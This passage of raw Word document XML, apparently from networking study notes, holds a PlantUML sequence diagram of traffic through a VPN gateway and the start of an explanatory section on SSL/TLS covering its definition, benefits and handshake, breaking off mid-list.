                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00135EB3">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  - Bandwidth/rate limiting</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B54A81F" w14:textId="77777777" w:rsidR="00135EB3" w:rsidRPr="00135EB3" w:rsidRDefault="00135EB3" w:rsidP="00135EB3">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00135EB3">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>end note</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="39C2896D" w14:textId="77777777" w:rsidR="00135EB3" w:rsidRPr="00135EB3" w:rsidRDefault="00135EB3" w:rsidP="00135EB3">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="771EDE1B" w14:textId="77777777" w:rsidR="00135EB3" w:rsidRPr="00135EB3" w:rsidRDefault="00135EB3" w:rsidP="00135EB3">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00135EB3">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>Firewall --&gt; Gateway: Forward to VPN gateway</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="763BA4E5" w14:textId="77777777" w:rsidR="00135EB3" w:rsidRPr="00135EB3" w:rsidRDefault="00135EB3" w:rsidP="00135EB3">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00135EB3">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>note right</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6931E564" w14:textId="77777777" w:rsidR="00135EB3" w:rsidRPr="00135EB3" w:rsidRDefault="00135EB3" w:rsidP="00135EB3">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00135EB3">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  - HA/load</w:t>
            </w:r>
            <w:r w:rsidRPr="00135EB3">
              <w:rPr>
                <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>‑</w:t>
            </w:r>
            <w:r w:rsidRPr="00135EB3">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>balancing with session stickiness</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3A3A2570" w14:textId="77777777" w:rsidR="00135EB3" w:rsidRPr="00135EB3" w:rsidRDefault="00135EB3" w:rsidP="00135EB3">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00135EB3">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  - Maintains identity binding</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="63BB1A0B" w14:textId="77777777" w:rsidR="00135EB3" w:rsidRPr="00135EB3" w:rsidRDefault="00135EB3" w:rsidP="00135EB3">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00135EB3">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>end note</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1BE30877" w14:textId="77777777" w:rsidR="00135EB3" w:rsidRPr="00135EB3" w:rsidRDefault="00135EB3" w:rsidP="00135EB3">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00135EB3">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>end</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6FC8895B" w14:textId="77777777" w:rsidR="00135EB3" w:rsidRPr="00135EB3" w:rsidRDefault="00135EB3" w:rsidP="00135EB3">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7B4A56E0" w14:textId="77777777" w:rsidR="00135EB3" w:rsidRPr="00135EB3" w:rsidRDefault="00135EB3" w:rsidP="00135EB3">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00135EB3">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">group #E8F5E9 Website request &amp; response </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6DF3C216" w14:textId="77777777" w:rsidR="00135EB3" w:rsidRPr="00135EB3" w:rsidRDefault="00135EB3" w:rsidP="00135EB3">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00135EB3">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>Gateway -&gt; Internet: Send request to Internet</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B69C9CB" w14:textId="77777777" w:rsidR="00135EB3" w:rsidRPr="00135EB3" w:rsidRDefault="00135EB3" w:rsidP="00135EB3">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00135EB3">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>note right</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="646F37B4" w14:textId="77777777" w:rsidR="00135EB3" w:rsidRPr="00135EB3" w:rsidRDefault="00135EB3" w:rsidP="00135EB3">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00135EB3">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  - Gateway acts as your public IP</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="19B8CEC2" w14:textId="77777777" w:rsidR="00135EB3" w:rsidRPr="00135EB3" w:rsidRDefault="00135EB3" w:rsidP="00135EB3">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00135EB3">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  - Routes decrypted request to the real site</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="61E09E33" w14:textId="77777777" w:rsidR="00135EB3" w:rsidRPr="00135EB3" w:rsidRDefault="00135EB3" w:rsidP="00135EB3">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00135EB3">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  - May apply content filtering or logging</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0121ED70" w14:textId="77777777" w:rsidR="00135EB3" w:rsidRPr="00135EB3" w:rsidRDefault="00135EB3" w:rsidP="00135EB3">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00135EB3">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>end note</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D9E8C2D" w14:textId="77777777" w:rsidR="00135EB3" w:rsidRPr="00135EB3" w:rsidRDefault="00135EB3" w:rsidP="00135EB3">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="16744D74" w14:textId="77777777" w:rsidR="00135EB3" w:rsidRPr="00135EB3" w:rsidRDefault="00135EB3" w:rsidP="00135EB3">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00135EB3">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>Internet --&gt; Gateway: Response back to gateway</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="06CC157A" w14:textId="77777777" w:rsidR="00135EB3" w:rsidRPr="00135EB3" w:rsidRDefault="00135EB3" w:rsidP="00135EB3">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00135EB3">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>note right</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E60993C" w14:textId="77777777" w:rsidR="00135EB3" w:rsidRPr="00135EB3" w:rsidRDefault="00135EB3" w:rsidP="00135EB3">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00135EB3">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  Gateway receives site's reply, ready to encrypt before sending back.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3AE385ED" w14:textId="77777777" w:rsidR="00135EB3" w:rsidRPr="00135EB3" w:rsidRDefault="00135EB3" w:rsidP="00135EB3">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00135EB3">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>end note</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="45959F47" w14:textId="77777777" w:rsidR="00135EB3" w:rsidRPr="00135EB3" w:rsidRDefault="00135EB3" w:rsidP="00135EB3">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="180C39E4" w14:textId="77777777" w:rsidR="00135EB3" w:rsidRPr="00135EB3" w:rsidRDefault="00135EB3" w:rsidP="00135EB3">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00135EB3">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>Gateway --&gt; Internet: Encrypt response</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2815A42A" w14:textId="77777777" w:rsidR="00135EB3" w:rsidRPr="00135EB3" w:rsidRDefault="00135EB3" w:rsidP="00135EB3">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00135EB3">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>note right</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6147ABE8" w14:textId="77777777" w:rsidR="00135EB3" w:rsidRPr="00135EB3" w:rsidRDefault="00135EB3" w:rsidP="00135EB3">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00135EB3">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  - Uses session keys</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="159ADC85" w14:textId="77777777" w:rsidR="00135EB3" w:rsidRPr="00135EB3" w:rsidRDefault="00135EB3" w:rsidP="00135EB3">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00135EB3">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  - Rekeys if needed</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="710A89BE" w14:textId="77777777" w:rsidR="00135EB3" w:rsidRPr="00135EB3" w:rsidRDefault="00135EB3" w:rsidP="00135EB3">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00135EB3">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  - Adds MAC &amp; anti</w:t>
            </w:r>
            <w:r w:rsidRPr="00135EB3">
              <w:rPr>
                <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>‑</w:t>
            </w:r>
            <w:r w:rsidRPr="00135EB3">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>replay protection</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C533D67" w14:textId="77777777" w:rsidR="00135EB3" w:rsidRPr="00135EB3" w:rsidRDefault="00135EB3" w:rsidP="00135EB3">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00135EB3">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  shapes packets for public path</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="60676A2A" w14:textId="77777777" w:rsidR="00135EB3" w:rsidRPr="00135EB3" w:rsidRDefault="00135EB3" w:rsidP="00135EB3">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00135EB3">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>end note</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A60AD9D" w14:textId="77777777" w:rsidR="00135EB3" w:rsidRPr="00135EB3" w:rsidRDefault="00135EB3" w:rsidP="00135EB3">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="69F15080" w14:textId="77777777" w:rsidR="00135EB3" w:rsidRPr="00135EB3" w:rsidRDefault="00135EB3" w:rsidP="00135EB3">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00135EB3">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>Internet --&gt; Client: Deliver encrypted data</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="69AA3110" w14:textId="77777777" w:rsidR="00135EB3" w:rsidRPr="00135EB3" w:rsidRDefault="00135EB3" w:rsidP="00135EB3">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00135EB3">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>note right</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4129289A" w14:textId="77777777" w:rsidR="00135EB3" w:rsidRPr="00135EB3" w:rsidRDefault="00135EB3" w:rsidP="00135EB3">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00135EB3">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  - Uses chosen transport (UDP/TCP)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="63076419" w14:textId="77777777" w:rsidR="00135EB3" w:rsidRPr="00135EB3" w:rsidRDefault="00135EB3" w:rsidP="00135EB3">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00135EB3">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  - Handles roaming IP changes</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D981037" w14:textId="77777777" w:rsidR="00135EB3" w:rsidRPr="00135EB3" w:rsidRDefault="00135EB3" w:rsidP="00135EB3">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00135EB3">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  - Mitigates loss/jitter</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3DB2CE7F" w14:textId="77777777" w:rsidR="00135EB3" w:rsidRPr="00135EB3" w:rsidRDefault="00135EB3" w:rsidP="00135EB3">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00135EB3">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>end note</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0FA8A0AD" w14:textId="77777777" w:rsidR="00135EB3" w:rsidRPr="00135EB3" w:rsidRDefault="00135EB3" w:rsidP="00135EB3">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5328CBB6" w14:textId="77777777" w:rsidR="00135EB3" w:rsidRPr="00135EB3" w:rsidRDefault="00135EB3" w:rsidP="00135EB3">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00135EB3">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>Client --&gt; User: Display secure data</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5F1BEE2A" w14:textId="77777777" w:rsidR="00135EB3" w:rsidRPr="00135EB3" w:rsidRDefault="00135EB3" w:rsidP="00135EB3">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00135EB3">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>note right</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D8CB46C" w14:textId="77777777" w:rsidR="00135EB3" w:rsidRPr="00135EB3" w:rsidRDefault="00135EB3" w:rsidP="00135EB3">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00135EB3">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  - Decrypts &amp; injects into OS stack</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="29F2740B" w14:textId="77777777" w:rsidR="00135EB3" w:rsidRPr="00135EB3" w:rsidRDefault="00135EB3" w:rsidP="00135EB3">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00135EB3">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  - Kill switch if tunnel drops</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="555A978C" w14:textId="77777777" w:rsidR="00135EB3" w:rsidRPr="00135EB3" w:rsidRDefault="00135EB3" w:rsidP="00135EB3">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00135EB3">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  - Logs session stats</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F74AFA0" w14:textId="77777777" w:rsidR="00135EB3" w:rsidRPr="00135EB3" w:rsidRDefault="00135EB3" w:rsidP="00135EB3">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00135EB3">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>end note</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A8257D5" w14:textId="77777777" w:rsidR="00135EB3" w:rsidRPr="00135EB3" w:rsidRDefault="00135EB3" w:rsidP="00135EB3">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00135EB3">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>end</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="10E6E479" w14:textId="45703D87" w:rsidR="00731117" w:rsidRDefault="00135EB3" w:rsidP="00135EB3">
            <w:r w:rsidRPr="00135EB3">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>@enduml</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1B341CB4" w14:textId="5BA738EB" w:rsidR="006945DF" w:rsidRDefault="006945DF" w:rsidP="006945DF">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="006945DF">
        <w:t>SSL/TLS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F5B9C01" w14:textId="64DA098A" w:rsidR="00267B93" w:rsidRDefault="00267B93" w:rsidP="00267B93">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Definition</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="505151D8" w14:textId="00D72540" w:rsidR="00267B93" w:rsidRDefault="00267B93" w:rsidP="00267B93">
      <w:r w:rsidRPr="00267B93">
        <w:t xml:space="preserve">SSL </w:t>
      </w:r>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00267B93">
        <w:t>Secure Sockets Layer</w:t>
      </w:r>
      <w:r>
        <w:t>) is</w:t>
      </w:r>
      <w:r w:rsidRPr="00267B93">
        <w:t xml:space="preserve"> a protocol for encrypting, securing, and authenticating communications on the Internet. Although SSL was replaced by an updated protocol called TLS (Transport Layer Security) some time ago, "SSL" is still a commonly used term for this technology.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="652EAAA1" w14:textId="77777777" w:rsidR="00C94823" w:rsidRDefault="00C94823" w:rsidP="00C94823">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Benefits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A54C0BF" w14:textId="77777777" w:rsidR="00C94823" w:rsidRDefault="00C94823" w:rsidP="00C94823">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="443"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">TLS ensures that the server side, or the website the user is interacting with, is actually </w:t>
      </w:r>
      <w:r w:rsidRPr="00C155DE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>who they claim to</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> be.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36AB5027" w14:textId="1A098617" w:rsidR="00C94823" w:rsidRPr="00267B93" w:rsidRDefault="00C94823" w:rsidP="00267B93">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="443"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">TLS ensures that </w:t>
      </w:r>
      <w:r w:rsidRPr="00C155DE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>data has not been altered</w:t>
      </w:r>
      <w:r>
        <w:t>, since a message authentication code (MAC) is included with transmissions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="393DF377" w14:textId="33EE749E" w:rsidR="006945DF" w:rsidRDefault="006945DF" w:rsidP="006945DF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>How It Works</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35940374" w14:textId="3AA617B9" w:rsidR="003C6A34" w:rsidRPr="006945DF" w:rsidRDefault="003C6A34" w:rsidP="003C6A34">
      <w:r w:rsidRPr="006945DF">
        <w:t xml:space="preserve">SSL/TLS provides secure communication through </w:t>
      </w:r>
      <w:r>
        <w:t>many steps, but basicially what it does is</w:t>
      </w:r>
      <w:r w:rsidRPr="006945DF">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="226916F9" w14:textId="4DF268D4" w:rsidR="003C6A34" w:rsidRDefault="003C6A34" w:rsidP="00CF327E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="443"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Secure communication begins with a </w:t>
      </w:r>
      <w:r w:rsidRPr="003C6A34">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TLS handshake</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, in which the two communicating parties </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(client and server) </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">open a secure connection and exchange the </w:t>
      </w:r>
      <w:r w:rsidRPr="003C6A34">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>certificate</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (containing </w:t>
      </w:r>
      <w:r w:rsidRPr="003C6A34">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>public key</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="208FC5F1" w14:textId="77777777" w:rsidR="00C155DE" w:rsidRDefault="00C155DE" w:rsidP="00CF327E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="443"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The server makes its </w:t>
      </w:r>
      <w:r w:rsidRPr="00C155DE">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>public key</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> available publicly, and keep its </w:t>
      </w:r>
      <w:r w:rsidRPr="00C155DE">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>private key</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in secret.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A97A4E" w14:textId="77777777" w:rsidR="00C155DE" w:rsidRDefault="00C155DE" w:rsidP="00CF327E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
